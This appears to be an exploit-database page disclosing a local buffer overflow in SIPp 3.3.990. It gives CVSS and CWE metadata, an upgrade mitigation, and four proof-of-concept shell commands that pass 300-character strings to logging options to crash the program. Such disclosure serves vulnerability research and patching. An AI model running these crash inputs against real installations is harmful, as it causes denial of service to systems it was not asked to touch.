header-logo
Suggest Exploit
vendor:
SIPp
by:
Nawaf Alkeraithe
7.8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: SIPp
Affected Version From: 3.3.990
Affected Version To: 3.3.990
Patch Exists: YES
Related CWE: N/A
CPE: a:sipp:sipp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

SIPp 3.3.990 – Local Buffer Overflow (PoC)

SIPp 3.3.990 is vulnerable to a local buffer overflow vulnerability. An attacker can exploit this vulnerability by providing a large string of 'A's as an argument to the -trace_logs, -message_file, -calldebug_file, and -trace_err options. This will cause a segmentation fault and crash the application.

Mitigation:

Upgrade to the latest version of SIPp.
Source

Exploit-DB raw data:

# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC)
# Date: 2018-10-29
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage: http://sipp.sourceforge.net/
# Software Link:
https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download
<https://github.com/SIPp/sipp/releases>
# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018
# Tested on: 3.3.990

$ ./sipp -trace_logs $(python -c 'print "A"*300')



$ ./sipp -message_file $(python -c 'print "A"*300')



$ ./sipp -calldebug_file $(python -c 'print "A"*300')



$ ./sipp -trace_err $(python -c 'print "A"*300')